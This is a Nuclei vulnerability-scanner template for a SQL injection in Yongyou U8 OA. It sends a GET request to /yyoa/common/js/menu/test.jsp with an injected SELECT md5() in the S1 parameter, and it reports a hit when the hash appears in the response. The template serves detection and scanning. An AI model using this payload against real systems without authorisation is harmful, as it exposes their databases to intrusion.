nuclei-templates/vulnerabilities/other/yongyou-u8-oa-sqli.yaml

26 lines
641 B
YAML

id: yongyou-u8-oa-sqli
info:
name: Yongyou U8 OA Sqli
author: ritikchaddha
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: yongyou,u8,oa,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- type: status
status:
- 200